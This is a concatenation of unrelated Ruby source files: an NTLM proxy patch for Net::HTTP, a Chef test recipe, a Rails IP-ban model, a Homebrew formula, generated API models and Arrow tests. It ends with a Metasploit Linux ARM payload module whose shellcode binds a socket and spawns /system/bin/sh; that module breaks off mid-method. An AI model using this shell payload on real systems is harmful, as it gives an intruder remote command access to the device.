OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT |
OpenSSL::SSL::SSLContext::SESSION_CACHE_NO_INTERNAL_STORE
@ssl_context.session_new_cb = proc {|sock, sess| @ssl_session = sess }
D "starting SSL for #{conn_addr}:#{conn_port}..."
s = OpenSSL::SSL::SSLSocket.new(s, @ssl_context)
s.sync_close = true
# Server Name Indication (SNI) RFC 3546
s.hostname = @address if s.respond_to? :hostname=
if @ssl_session and
Process.clock_gettime(Process::CLOCK_REALTIME) < @ssl_session.time.to_f + @ssl_session.timeout
s.session = @ssl_session
end
ssl_socket_connect(s, @open_timeout)
if (@ssl_context.verify_mode != OpenSSL::SSL::VERIFY_NONE) && @ssl_context.verify_hostname
s.post_connection_check(@address)
end
D "SSL established, protocol: #{s.ssl_version}, cipher: #{s.cipher[0]}"
end
@socket = BufferedIO.new(s, read_timeout: @read_timeout,
write_timeout: @write_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
on_connect
rescue => exception
if s
D "Conn close because of connect error #{exception}"
s.close
end
raise
end
private
def ntlm_auth?(res)
proxy_user && res.code.to_i == 407 && Array(res["Proxy-Authenticate"]).include?("NTLM")
end
def ntlm_auth(req)
negotiate_message = Net::NTLM::Message::Type1.new
req["Proxy-Authorization"] = "NTLM #{Base64.strict_encode64(negotiate_message.serialize)}"
req["Connection"] = "Keep-Alive"
req["Proxy-Connection"] = "Keep-Alive"
negotiate_response = transport_request(req)
authphrase = negotiate_response["Proxy-Authenticate"] or return res
challenge_message = Net::NTLM::Message::Type2.parse(Base64.strict_decode64(authphrase.gsub(/^NTLM /, "")))
authenticate_message = challenge_message.response(parse_proxy_user(proxy_user).merge(password: proxy_pass))
req["Proxy-Authorization"] = "NTLM #{Base64.strict_encode64(authenticate_message.serialize)}"
end
def connect_proxy(s, conn_address)
plain_sock = BufferedIO.new(s, read_timeout: @read_timeout,
write_timeout: @write_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
buf = "CONNECT #{conn_address}:#{@port} HTTP/#{HTTPVersion}\r\n"
buf << "Host: #{@address}:#{@port}\r\n"
if proxy_user
credential = ["#{proxy_user}:#{proxy_pass}"].pack('m0')
buf << "Proxy-Authorization: Basic #{credential}\r\n"
end
buf << "\r\n"
plain_sock.write(buf)
HTTPResponse.read_new(plain_sock).value
# assuming nothing left in buffers after successful CONNECT response
rescue Net::HTTPServerException
if ntlm_auth?($!.response)
plain_sock.read($!.response["Content-Length"].to_i)
connect_proxy_with_ntlm_auth(s, conn_address)
else
raise
end
end
def connect_proxy_with_ntlm_auth(s, conn_address)
plain_sock = BufferedIO.new(s, read_timeout: @read_timeout,
write_timeout: @write_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
negotiate_message = Net::NTLM::Message::Type1.new
plain_sock.write([
"CONNECT #{conn_address}:#{@port} HTTP/#{HTTPVersion}",
"Host: #{@address}:#{@port}",
"Proxy-Authorization: NTLM #{Base64.strict_encode64(negotiate_message.serialize)}",
"Proxy-Connection: Keep-Alive",
].join("\r\n") + "\r\n\r\n")
res = HTTPResponse.read_new(plain_sock)
begin
res.value
rescue Net::HTTPClientException
unless $!.response.code.to_i == 407
raise
end
if res["Content-Length"]
plain_sock.read(res["Content-Length"].to_i)
end
end
challenge_message = Net::NTLM::Message::Type2.parse(Base64.decode64(res["Proxy-Authenticate"].gsub(/^NTLM /, "")))
authenticate_message = challenge_message.response(parse_proxy_user(proxy_user).merge(password: proxy_pass))
plain_sock.write([
"CONNECT #{conn_address}:#{@port} HTTP/#{HTTPVersion}",
"Host: #{@address}:#{@port}",
"Proxy-Authorization: NTLM #{Base64.strict_encode64(authenticate_message.serialize)}",
"Proxy-Connection: Keep-Alive",
].join("\r\n") + "\r\n\r\n")
HTTPResponse.read_new(plain_sock).value
end
# Returns {user: user, domain: domain}
def parse_proxy_user(proxy_user)
case proxy_user
when /(.+?)\\(.+)/ # domain\user
{user: $2, domain: $1}
when /(.+?)@(.+)/ # user@domain
{user: $1, domain: $2}
else
{user: proxy_user}
end
end
end
end
end
Net::HTTP.prepend(Net::HTTP::ProxyAuthenticateNTLM)
| 34.40708 | 122 | 0.579475 |
ed1df1a2ee12bc4447408fccaa155e7cc72aff75 | 91 | # desc "Explaining what the task does"
# task :easel_helpers do
# # Task goes here
# end
| 18.2 | 38 | 0.692308 |
1c770f06fde2c4f1439103b79c4f35db21ca6170 | 1,020 | nexus3_cleanup_policy 'integration_cleanup_policy' do
format 'raw'
criteria lastBlobUpdated: '604800', lastDownloaded: '259200'
end
# Hosted rubygems repository on the default blob store (write-once policy).
nexus3_repo 'integration_repo' do
  attributes storage: { blobStoreName: 'default', writePolicy: 'ALLOW_ONCE' }
  repo_type 'rubygems-hosted'
end

# Rubygems group repository with strict content-type validation.
nexus3_group 'integration_group' do
  attributes storage: { blobStoreName: 'default', strictContentTypeValidation: true }
  group_type 'rubygems-group'
end

# Use RutAuth because there is low chance that we actually enable it
nexus3_realm 'rutauth-realm' do
  enable true
end

# Empty role used to exercise role creation.
nexus3_role 'integration_role' do
  description 'Role created during integration tests'
  roles []
  privileges []
end

# Scheduled script task (crontab: daily at 02:00).
nexus3_task 'integration_task' do
  task_type 'script'
  crontab '0 2 * * * ?'
  properties({ 'language' => 'lang',
               'source' => 'log.info("Hello task");' })
end

# Local user assigned the integration role.
nexus3_user 'integration_user' do
  password 'Secret'
  first_name 'integration'
  last_name 'user'
  email '[email protected]'
  roles ['integration_role']
end
6143f2cddaf534f8a95136dfaa88e16bad7034c0 | 2,721 | class IpBan < ApplicationRecord
belongs_to :creator, class_name: "User"
validate :validate_ip_addr
validates :reason, presence: true
before_save :create_mod_action
deletable
enum category: {
full: 0,
partial: 100
}, _suffix: "ban"
def self.ip_matches(ip_addr)
where("ip_addr >>= ?", ip_addr)
end
def self.hit!(category, ip_addr)
ip_ban = active.where(category: category).ip_matches(ip_addr).first
return false unless ip_ban
IpBan.increment_counter(:hit_count, ip_ban.id, touch: [:last_hit_at])
true
end
def self.search(params)
q = search_attributes(params, :id, :created_at, :updated_at, :ip_addr, :reason, :is_deleted, :category, :hit_count, :last_hit_at, :creator)
q = q.text_attribute_matches(:reason, params[:reason_matches])
case params[:order]
when /\A(created_at|updated_at|last_hit_at)(?:_(asc|desc))?\z/i
column = $1
dir = $2 || :desc
q = q.order(Arel.sql("#{column} #{dir} NULLS LAST")).order(id: :desc)
else
q = q.apply_default_order(params)
end
q
end
def create_mod_action
if new_record?
ModAction.log("#{creator.name} created ip ban for #{ip_addr}", :ip_ban_create)
elsif is_deleted? == true && is_deleted_was == false
ModAction.log("#{CurrentUser.user.name} deleted ip ban for #{ip_addr}", :ip_ban_delete)
elsif is_deleted? == false && is_deleted_was == true
ModAction.log("#{CurrentUser.user.name} undeleted ip ban for #{ip_addr}", :ip_ban_undelete)
end
end
def validate_ip_addr
if ip_addr.blank?
errors.add(:ip_addr, "is invalid")
elsif ip_addr.private? || ip_addr.loopback? || ip_addr.link_local?
errors.add(:ip_addr, "must be a public address")
elsif full_ban? && ip_addr.ipv4? && ip_addr.prefix < 24
errors.add(:ip_addr, "may not have a subnet bigger than /24")
elsif partial_ban? && ip_addr.ipv4? && ip_addr.prefix < 8
errors.add(:ip_addr, "may not have a subnet bigger than /8")
elsif full_ban? && ip_addr.ipv6? && ip_addr.prefix < 64
errors.add(:ip_addr, "may not have a subnet bigger than /64")
elsif partial_ban? && ip_addr.ipv6? && ip_addr.prefix < 20
errors.add(:ip_addr, "may not have a subnet bigger than /20")
elsif new_record? && IpBan.active.ip_matches(subnetted_ip).exists?
errors.add(:ip_addr, "is already banned")
end
end
def has_subnet?
(ip_addr.ipv4? && ip_addr.prefix < 32) || (ip_addr.ipv6? && ip_addr.prefix < 128)
end
def subnetted_ip
str = ip_addr.to_s
str += "/" + ip_addr.prefix.to_s if has_subnet?
str
end
def ip_addr=(ip_addr)
super(ip_addr.strip)
end
def self.available_includes
[:creator]
end
end
| 30.573034 | 143 | 0.668504 |
f89c745e61e752160d66c1d86f13bcb269969ad9 | 21 | # typed: true
yield
| 5.25 | 13 | 0.666667 |
187890f6fe29c6514e9b4234750ed84463e61291 | 737 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
# CocoaPods spec for the iOS half of the adv_image_picker Flutter plugin.
Pod::Spec.new do |s|
  s.name             = 'adv_image_picker'
  s.version          = '0.3.1'
  s.summary          = 'An advanced image picker with crop'
  s.description      = <<-DESC
An advanced image picker with crop
                       DESC
  # NOTE(review): homepage is still the generator placeholder — fill in before publishing.
  s.homepage         = 'http://example.com'
  s.license          = { :file => '../LICENSE' }
  s.author           = { 'Your Company' => '[email protected]' }
  s.source           = { :path => '.' }
  # Plugin sources and public headers live under Classes/.
  s.source_files = 'Classes/**/*'
  s.public_header_files = 'Classes/**/*.h'
  s.dependency 'Flutter'
  s.pod_target_xcconfig = { "DEFINES_MODULE" => "YES" }
  s.ios.deployment_target = '9.0'
end
| 30.708333 | 83 | 0.559023 |
08a941d68fd875f09c8c82cd122690eb70d0f902 | 175 | class Admin::DeviseAuthyController < Devise::DeviseAuthyController
layout "twofactor"
def after_authy_enabled_path_for(resource)
admin_dashboard_index_path
end
end
| 21.875 | 66 | 0.822857 |
26b25bf6ae6c07a141be8cf7748acb80023b3f37 | 36 | module LAMA
VERSION = '0.0.1'
end
| 9 | 19 | 0.638889 |
6a5b2e8cc5bacec3fc75e002d9aafe187cf6b666 | 1,940 | class Jenkins < Formula
desc "Extendable open source continuous integration server"
homepage "https://jenkins-ci.org"
url "http://mirrors.jenkins-ci.org/war/1.643/jenkins.war"
sha256 "b8c6387e56d04a0a4a7ec8d9dacd379fbd5d4001d01fdfcd443f9864809f9293"
head do
url "https://github.com/jenkinsci/jenkins.git"
depends_on "maven" => :build
end
bottle :unneeded
depends_on :java => "1.7+"
def install
if build.head?
ENV.java_cache
system "mvn", "clean", "install", "-pl", "war", "-am", "-DskipTests"
else
system "jar", "xvf", "jenkins.war"
end
libexec.install Dir["**/jenkins.war", "**/jenkins-cli.jar"]
bin.write_jar_script libexec/"jenkins.war", "jenkins"
bin.write_jar_script libexec/"jenkins-cli.jar", "jenkins-cli"
end
plist_options :manual => "jenkins"
def plist; <<-EOS.undent
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/java</string>
<string>-Dmail.smtp.starttls.enable=true</string>
<string>-jar</string>
<string>#{opt_libexec}/jenkins.war</string>
<string>--httpListenAddress=127.0.0.1</string>
<string>--httpPort=8080</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
def caveats; <<-EOS.undent
Note: When using launchctl the port will be 8080.
EOS
end
test do
ENV["JENKINS_HOME"] = testpath
pid = fork do
exec "#{bin}/jenkins"
end
sleep 60
begin
assert_match /"mode":"NORMAL"/, shell_output("curl localhost:8080/api/json")
ensure
Process.kill("SIGINT", pid)
Process.wait(pid)
end
end
end
| 26.575342 | 106 | 0.618557 |
0137df95302c22b1ba863dbc4b6c8d3f36b6074f | 94 | FactoryBot.define do
factory :secret do
content { "MyText" }
user { nil }
end
end
| 13.428571 | 24 | 0.62766 |
18eff5bcc563d8e56a35adb8c3ef759d30e9df33 | 5,953 | =begin
#OpenAPI Petstore
#This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 4.0.0-SNAPSHOT
=end
require 'date'
module Petstore
# Model for testing model with \"_class\" property
class ClassModel
attr_accessor :_class
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'_class' => :'_class'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'_class' => :'String'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Petstore::ClassModel` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Petstore::ClassModel`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'_class')
self._class = attributes[:'_class']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
_class == o._class
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[_class].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
Petstore.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 30.065657 | 198 | 0.626071 |
1a6193bc41d4b3e18623a95077fb8cc2fc3993b0 | 1,084 | lib = File.expand_path("../lib", __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require "jekyll-github-meta/version"
Gem::Specification.new do |spec|
spec.name = "jekyll-github-meta"
spec.summary = "Add meta data from GitHub account to site config"
spec.description = "Add meta data from GitHub account to site config"
spec.version = JekyllGithubMeta::VERSION
spec.authors = ["Jam Risser"]
spec.email = ["[email protected]"]
spec.homepage = "https://github.com/jamrizzi/jekyll-github-meta"
spec.licenses = ["MIT"]
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r!^(test|spec|features)/!) }
spec.require_paths = ["lib"]
spec.add_dependency "jekyll", "~> 3.0"
spec.add_dependency "octokit", "~> 4.8"
spec.add_dependency "jekyll-site-config", "~> 0.1"
spec.add_dependency "faraday-http-cache", "~> 2.0"
spec.add_development_dependency "rake", "~> 11.0"
spec.add_development_dependency "rspec", "~> 3.5"
spec.add_development_dependency "rubocop", "~> 0.52"
end
| 47.130435 | 105 | 0.663284 |
e27b724fd90cb02cc7f7e20f8fb1afc0f7e2bc1c | 4,136 | require 'spec_helper'
module VCAP::CloudController
describe ServiceDashboardClient do
let(:service_broker) { ServiceBroker.make }
let(:other_broker) { ServiceBroker.make }
let(:uaa_id) { 'claimed_client_id' }
it { is_expected.to have_timestamp_columns }
describe 'Associations' do
it { is_expected.to have_associated :service_broker }
end
describe 'Validations' do
it { is_expected.to validate_presence :uaa_id }
it { is_expected.to validate_uniqueness :uaa_id }
context 'when all fields are valid' do
let(:client) { ServiceDashboardClient.make_unsaved(service_broker: service_broker) }
it 'is valid' do
expect(client).to be_valid
end
end
end
describe '.find_clients_claimed_by_broker' do
before do
ServiceDashboardClient.claim_client_for_broker('client-1', service_broker)
ServiceDashboardClient.claim_client_for_broker('client-2', other_broker)
ServiceDashboardClient.claim_client_for_broker('client-3', service_broker)
end
it 'returns all clients claimed by the broker' do
results = ServiceDashboardClient.find_clients_claimed_by_broker(service_broker)
expect(results).to have(2).entries
expect(results.map(&:uaa_id)).to match_array ['client-1', 'client-3']
end
end
describe '.claim_client_for_broker' do
context 'when the client is unclaimed' do
it 'claims the client for the broker' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.to change {
ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker)
}.to(true)
end
end
context 'when a claim without a broker id exists' do
before do
ServiceDashboardClient.make(service_broker: nil, uaa_id: uaa_id)
end
it 'claims the client for the broker' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.to change {
ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker)
}.to(true)
end
end
context 'when the client is already claimed by another broker' do
before do
ServiceDashboardClient.claim_client_for_broker(uaa_id, other_broker)
end
it 'raises an exception' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.to raise_exception(Sequel::ValidationFailed)
end
end
context 'when the client is already claimed by the specified broker' do
before do
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
end
it 'does not change the fact that the client is claimed by the broker' do
expect {
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
}.not_to change {
ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker)
}
end
end
end
describe '.remove_claim_on_client' do
before do
ServiceDashboardClient.claim_client_for_broker(uaa_id, service_broker)
end
it 'removes the claim' do
expect {
ServiceDashboardClient.remove_claim_on_client(uaa_id)
}.to change { ServiceDashboardClient.client_claimed_by_broker?(uaa_id, service_broker) }.to(false)
end
end
describe '.find_client_by_uaa_id' do
context 'when no clients with the specified uaa_id exist' do
it 'returns nil' do
expect(ServiceDashboardClient.find_client_by_uaa_id('some-uaa-id')).to be_nil
end
end
context 'when one client exists with the specified uaa_id' do
let!(:client) {
ServiceDashboardClient.make(uaa_id: 'some-uaa-id', service_broker: nil)
}
it 'returns the client' do
expect(ServiceDashboardClient.find_client_by_uaa_id('some-uaa-id')).to eq(client)
end
end
end
end
end
| 33.088 | 106 | 0.670696 |
e895746ca2f0b9194e748c55e3f8e939949d7a0d | 7,176 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module ValuesBasicArraysTests
def test_null
target = build(Arrow::NullArray.new(4))
assert_equal([nil] * 4, target.values)
end
def test_boolean
values = [true, nil, false]
target = build(Arrow::BooleanArray.new(values))
assert_equal(values, target.values)
end
def test_int8
values = [
-(2 ** 7),
nil,
(2 ** 7) - 1,
]
target = build(Arrow::Int8Array.new(values))
assert_equal(values, target.values)
end
def test_uint8
values = [
0,
nil,
(2 ** 8) - 1,
]
target = build(Arrow::UInt8Array.new(values))
assert_equal(values, target.values)
end
def test_int16
values = [
-(2 ** 15),
nil,
(2 ** 15) - 1,
]
target = build(Arrow::Int16Array.new(values))
assert_equal(values, target.values)
end
def test_uint16
values = [
0,
nil,
(2 ** 16) - 1,
]
target = build(Arrow::UInt16Array.new(values))
assert_equal(values, target.values)
end
def test_int32
values = [
-(2 ** 31),
nil,
(2 ** 31) - 1,
]
target = build(Arrow::Int32Array.new(values))
assert_equal(values, target.values)
end
def test_uint32
values = [
0,
nil,
(2 ** 32) - 1,
]
target = build(Arrow::UInt32Array.new(values))
assert_equal(values, target.values)
end
def test_int64
values = [
-(2 ** 63),
nil,
(2 ** 63) - 1,
]
target = build(Arrow::Int64Array.new(values))
assert_equal(values, target.values)
end
def test_uint64
values = [
0,
nil,
(2 ** 64) - 1,
]
target = build(Arrow::UInt64Array.new(values))
assert_equal(values, target.values)
end
def test_float
values = [
-1.0,
nil,
1.0,
]
target = build(Arrow::FloatArray.new(values))
assert_equal(values, target.values)
end
def test_double
values = [
-1.0,
nil,
1.0,
]
target = build(Arrow::DoubleArray.new(values))
assert_equal(values, target.values)
end
def test_binary
values = [
"\x00".b,
nil,
"\xff".b,
]
target = build(Arrow::BinaryArray.new(values))
assert_equal(values, target.values)
end
def test_tring
values = [
"Ruby",
nil,
"\u3042", # U+3042 HIRAGANA LETTER A
]
target = build(Arrow::StringArray.new(values))
assert_equal(values, target.values)
end
def test_date32
values = [
Date.new(1960, 1, 1),
nil,
Date.new(2017, 8, 23),
]
target = build(Arrow::Date32Array.new(values))
assert_equal(values, target.values)
end
def test_date64
values = [
DateTime.new(1960, 1, 1, 2, 9, 30),
nil,
DateTime.new(2017, 8, 23, 14, 57, 2),
]
target = build(Arrow::Date64Array.new(values))
assert_equal(values, target.values)
end
def test_timestamp_second
values = [
Time.parse("1960-01-01T02:09:30Z"),
nil,
Time.parse("2017-08-23T14:57:02Z"),
]
target = build(Arrow::TimestampArray.new(:second, values))
assert_equal(values, target.values)
end
def test_timestamp_milli
values = [
Time.parse("1960-01-01T02:09:30.123Z"),
nil,
Time.parse("2017-08-23T14:57:02.987Z"),
]
target = build(Arrow::TimestampArray.new(:milli, values))
assert_equal(values, target.values)
end
def test_timestamp_micro
values = [
Time.parse("1960-01-01T02:09:30.123456Z"),
nil,
Time.parse("2017-08-23T14:57:02.987654Z"),
]
target = build(Arrow::TimestampArray.new(:micro, values))
assert_equal(values, target.values)
end
def test_timestamp_nano
values = [
Time.parse("1960-01-01T02:09:30.123456789Z"),
nil,
Time.parse("2017-08-23T14:57:02.987654321Z"),
]
target = build(Arrow::TimestampArray.new(:nano, values))
assert_equal(values, target.values)
end
def test_time32_second
unit = Arrow::TimeUnit::SECOND
values = [
Arrow::Time.new(unit, 60 * 10), # 00:10:00
nil,
Arrow::Time.new(unit, 60 * 60 * 2 + 9), # 02:00:09
]
target = build(Arrow::Time32Array.new(:second, values))
assert_equal(values, target.values)
end
def test_time32_milli
unit = Arrow::TimeUnit::MILLI
values = [
Arrow::Time.new(unit, (60 * 10) * 1000 + 123), # 00:10:00.123
nil,
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1000 + 987), # 02:00:09.987
]
target = build(Arrow::Time32Array.new(:milli, values))
assert_equal(values, target.values)
end
def test_time64_micro
unit = Arrow::TimeUnit::MICRO
values = [
# 00:10:00.123456
Arrow::Time.new(unit, (60 * 10) * 1_000_000 + 123_456),
nil,
# 02:00:09.987654
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000 + 987_654),
]
target = build(Arrow::Time64Array.new(:micro, values))
assert_equal(values, target.values)
end
def test_time64_nano
unit = Arrow::TimeUnit::NANO
values = [
# 00:10:00.123456789
Arrow::Time.new(unit, (60 * 10) * 1_000_000_000 + 123_456_789),
nil,
# 02:00:09.987654321
Arrow::Time.new(unit, (60 * 60 * 2 + 9) * 1_000_000_000 + 987_654_321),
]
target = build(Arrow::Time64Array.new(:nano, values))
assert_equal(values, target.values)
end
def test_decimal128
values = [
BigDecimal("92.92"),
nil,
BigDecimal("29.29"),
]
data_type = Arrow::Decimal128DataType.new(8, 2)
target = build(Arrow::Decimal128Array.new(data_type, values))
assert_equal(values, target.values)
end
def test_decimal256
values = [
BigDecimal("92.92"),
nil,
BigDecimal("29.29"),
]
data_type = Arrow::Decimal256DataType.new(38, 2)
target = build(Arrow::Decimal256Array.new(data_type, values))
assert_equal(values, target.values)
end
def test_month_interval
values = [
1,
nil,
12,
]
target = build(Arrow::MonthIntervalArray.new(values))
assert_equal(values, target.values)
end
end
# Runs the shared value-conversion assertions against plain Arrow arrays:
# build is the identity, so each target is the Arrow::Array itself.
class ValuesArrayBasicArraysTest < Test::Unit::TestCase
  include ValuesBasicArraysTests
  def build(array)
    array
  end
end
# Re-runs the same shared assertions with each array wrapped in a
# single-chunk Arrow::ChunkedArray, so both code paths must agree.
class ValuesChunkedArrayBasicArraysTest < Test::Unit::TestCase
  include ValuesBasicArraysTests
  def build(array)
    Arrow::ChunkedArray.new([array])
  end
end
| 23.45098 | 77 | 0.620262 |
624bd34bc1b31cfa9cc8903679ec1a45e8022a20 | 175 | class CreateGames < ActiveRecord::Migration[5.0]
def change
create_table :games do |t|
t.string :name
t.integer :price
t.timestamps
end
end
end
| 15.909091 | 48 | 0.64 |
39aecc0b09bbc528df6902c9709538dd48e3e2b5 | 4,108 | require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Single
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux Command Shell, Reverse TCP Inline',
'Version' => '',
'Description' => 'Connect to target and spawn a command shell',
'Author' => ['civ', 'hal'],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix,
'Payload' =>
{
'Offsets' =>
{
'RHOST' => [ 208, 'ADDR' ],
'LPORT' => [ 206, 'n' ],
},
'Payload' =>
[
# socket
0xe3a00002, # mov r0, #2
0xe3a01001, # mov r1, #1
0xe3a02006, # mov r2, #6
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe2877019, # add r7, r7, #25
0xef000000, # svc 0x00000000
0xe1a06000, # mov r6, r0
# bind
0xe28f10A4, # 1dr r1, pc, #172 ; 0x9C
0xe3a02010, # mov r2, #16
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe287701a, # add r7, r7, #26
0xef000000, # svc 0x00000000
# listen
0xe1a00006, # mov r0, r6
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe287701c, # add r7, r7, #28
0xef000000, # svc 0x00000000
# accept
0xe1a00006, # mov r0, r6
0xe0411001, # sub r1, r1, r1
0xe0422002, # sub r2, r2, r2
0xe3a07001, # mov r7, #1
0xe1a07407, # lsl r7, r7, #8
0xe287701d, # add r7, r7, #29
0xef000000, # svc 0x00000000
# dup
0xe1a06000, # mov r6, r0
0xe3a01002, # mov r1, #2
0xe1a00006, # mov r0, r6
0xe3a0703f, # mov r7, #63 ; 0x3f
0xef000000, # svc 0x00000000
0xe2511001, # subs r1, r1, #1
0x5afffffa, # bpl 8c <.text+0x8c>
# execve("/system/bin/sh", args, env)
0xe28f0048, # add r0, pc, #72 ; 0xe40
0xe0244004, # eor r4, r4, r4
0xe92d0010, # push {r4}
0xe1a0200d, # mov r2, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe92d0010, # push {r4}
0xe59f1048, # ldr r1, [pc, #72] ; 8124 <env+0xe8>
0xe92d0002, # push {r1}
0xe92d2000, # push {sp}
0xe1a0100d, # mov r1, sp
0xe92d0004, # push {r2}
0xe1a0200d, # mov r2, sp
0xe3a0700b, # mov r7, #11 ; 0xeb
0xef000000, # svc 0x00000000
# exit(0)
0xe3a00000, # mov r0, #0 ; 0x0
0xe3a07001, # mov r7, #1 ; 0x1
0xef000000, # svc 0x00000000
# <af>:
0x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2
0x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.1
# <shell>:
0x00000000, # .word 0x00000000 ; the shell goes here!
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
0x00000000, # .word 0x00000000
# <arg>:
0x00000000 # .word 0x00000000 ; the args!
].pack("V*")
}
))
# Register command execution options
register_options(
[
OptString.new('SHELL', [ true, "The shell to execute.", "/system/bin/sh" ]),
OptString.new('SHELLARG', [ false, "The argument to pass to the shell.", "-C" ])
], self.class)
end
def generate
p = super
sh = datastore['SHELL']
if sh.length >= 16
raise ArgumentError, "The specified shell must be less than 16 bytes."
end
p[212, sh.length] = sh
arg = datastore['SHELLARG']
if arg
if arg.length >= 4
raise ArgumentError, "The specified shell argument must be less than 4 bytes."
end
